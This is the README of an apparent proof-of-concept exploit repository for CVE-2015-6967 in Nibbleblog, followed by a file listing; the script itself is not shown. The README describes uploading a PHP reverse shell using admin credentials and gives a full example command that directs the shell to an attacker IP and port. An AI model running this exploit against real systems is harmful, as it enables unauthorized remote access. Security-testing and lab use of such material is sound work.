CVE-2015-6967 PoC Exploit# CVE-2015-6967-EXPLOIT
CVE-2015-6967 PoC Exploit
This Python script exploits a vulnerability in **Nibbleblog** (CVE-2015-6967) to upload a reverse shell on a vulnerable target. The script takes user input for the target URL, user credentials, and your host IP/port, and then proceeds to exploit the vulnerability by uploading a PHP reverse shell.
## Disclaimer
This script is intended for educational purposes only. Do **NOT** use it for illegal activities. Always get explicit permission before testing or exploiting any vulnerabilities on systems that you do not own or have authorization to access.
## Requirements
- Python 3.x
- `requests` library
- `argparse` library
- `colorama` library
- `pyfiglet` library
You can install the required dependencies using the following command:
```
pip install requests colorama pyfiglet
```
Usage
The script requires several parameters to run:
url: Target Nibbleblog URL (e.g., http://10.10.14.14/nibbleblog)
-U, --user: Username for Nibbleblog admin
-P, --password: Password for Nibbleblog admin
-p, --host-port: Your local port for the reverse shell to connect to
-H, --host-ip: Your local IP address for the reverse shell to connect to
Example
`python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100`
[4.0K] /data/pocs/19cacb297db8a65facdb67a7366546fcf66ec354
├── [5.9K] CVE-2015-6967.py
└── [1.3K] README.md
0 directories, 2 files